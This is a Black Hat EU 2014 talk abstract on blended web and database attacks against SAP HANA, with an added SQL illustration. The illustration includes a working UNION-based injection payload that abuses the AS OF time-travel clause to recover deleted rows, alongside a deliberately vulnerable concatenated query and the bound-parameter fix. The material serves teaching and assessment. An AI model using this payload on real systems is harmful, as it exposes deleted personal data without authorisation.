BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS presented at Black Hat EU 2014

by Juan Perez-etchegoyen and Willis Vandevanter

Summary: It is well known that there is a race going on in the "Big Data" arena (take a drink for even thinking about the "Internet of Things"). One of the stronger competitors in the "Big Data" market is the Real-Time, In-Memory Platform. An interesting thing about this type of platform, and about the one we will talk about specifically, is that it blends everything together to increase performance: the database tables, web server engine, web server code, authorization, analytics engine, libraries, etc. are all optimized so that, where possible, they never touch the disk.
Surprisingly, this causes a perspective shift in the web and database application threat landscape and in how security professionals should address it. For example:
The resources are massive enough that the database can store all previous versions of a table. We will introduce a new SQL injection attack vector that abuses a "TIME TRAVEL" feature, providing access to previously deleted data.
The web application code is stored in the database and not on the filesystem! Or, to put it another way, web application code is executed through a web server engine that retrieves the code directly from the database. We will present server-side JavaScript exploits performed using SQL queries.
The database is enhanced with special libraries to support advanced analytics and statistical features, such as integration with the R programming environment. We will demonstrate how, if implemented insecurely, this could lead to exploits "written in R."
The web application's database queries are typically run in the context of the current user's session. In other words, no database credentials are stored in the web application back-end code. We will show how an attacker may need to resort to social engineering as a critical component of SQL injection.
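As an added illustration of the "TIME TRAVEL" point above, written for this page and not taken from the talk or from Onapsis: a history column table keeps every prior version of its rows, so a classic UNION-based injection that smuggles in an AS OF clause can read rows the application has already deleted. The table, columns, rows and the timestamp are invented for the example; the history-table and AS OF syntax is assumed to be that of SAP HANA.

```sql
-- Added example, not code from the original talk. Names and data are
-- constructed for illustration. HANA history column tables retain
-- old row versions so that queries can be run "as of" a past point.
CREATE HISTORY COLUMN TABLE customers (
  id    INTEGER PRIMARY KEY,
  name  NVARCHAR(100),
  email NVARCHAR(200)
);

INSERT INTO customers VALUES (1, 'Alice', 'alice@example.com');
INSERT INTO customers VALUES (2, 'Bob',   'bob@example.com');
COMMIT;

-- Bob is removed from the current view of the table.
DELETE FROM customers WHERE id = 2;
COMMIT;

-- Current view: returns only Alice.
SELECT name, email FROM customers;

-- Time travel: the table as it looked at an (assumed) timestamp that
-- falls between the insert and the delete. Returns Alice and Bob.
-- (AS OF COMMIT ID <n> is the commit-based form of the same clause.)
SELECT name, email FROM customers AS OF UTCTIMESTAMP '2014-10-01 12:00:00';

-- The vulnerable application query concatenates a search term:
--   SELECT name, email FROM customers WHERE name = '<input>'
-- With this <input> (no special privileges needed, only the victim's
-- ordinary session in which the query runs):
--   x' UNION SELECT name, email FROM customers AS OF UTCTIMESTAMP '2014-10-01 12:00:00' --
-- the statement becomes the one below, and the UNION branch returns
-- Bob's deleted row alongside the (empty) live result.
SELECT name, email FROM customers WHERE name = 'x'
UNION SELECT name, email FROM customers AS OF UTCTIMESTAMP '2014-10-01 12:00:00' --';

-- Fix: bind the value instead of concatenating it. A parameter marker
-- can only ever carry a value, never a UNION or an AS OF clause.
--   SELECT name, email FROM customers WHERE name = ?
```

The practical check for an assessor is two-fold: identify which application tables are history tables, since on those a plain injection point also exposes every superseded and deleted row, and confirm that application code passes user input only through bound parameters, because "the row was deleted" is not a mitigation on a platform that never forgets.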
In this talk, we will explore how an attacker might blend old attack vectors to achieve the same or novel goals in the industry-leading Real-Time, In-Memory platform: SAP HANA. We will present live demos of new vulnerabilities discovered by the Onapsis Research Labs team, as well as ways to ensure your platform is protected.
Furthermore, we will present a reference framework for professionals who need to assess the security of these unique platforms, as well as sample vulnerable applications for developers to understand how to avoid common pitfalls that would introduce security risks.
Basic understanding of Web Application and Database Security concepts is recommended to get the most out of this session.